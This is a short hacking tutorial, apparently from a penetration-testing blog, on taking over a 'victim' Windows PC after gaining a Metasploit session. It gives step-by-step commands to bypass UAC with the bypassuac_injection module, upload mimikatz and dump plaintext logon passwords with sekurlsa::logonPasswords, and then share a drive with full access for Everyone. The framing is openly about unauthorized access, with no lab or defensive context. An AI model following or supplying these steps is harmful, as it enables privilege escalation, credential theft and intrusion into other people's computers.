Kali Linux, Penetration Testing

How to Access Unauthorized on Remote PC using Metasploit

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you had a remote shell with Metasploit all now use the Bypass UAC module, set the session number and exploit it

use exploit/windows/local/bypassuac_injection

msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>exploit

mimikatz is a tool to check Windows security. It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

First Download mimikatz windows version from here and use the upload command to send a file to the target system.

Type the following command to check  privilege

privilege::debug

Now type the following command to get users passwords in text mode.

sekurlsa::logonPasswords

Using the “net help share” command you will see that the syntax is as follows:

net share raj=(Drive name):  /GRANT:Everyone,FULL

 Start, Run dialog box and define the path of the shared folder using the format \\192.18.0.101

It will show you the prompt and type username and password, and then click OK

Now you can access the shared folder. Below is the screenshot for reference.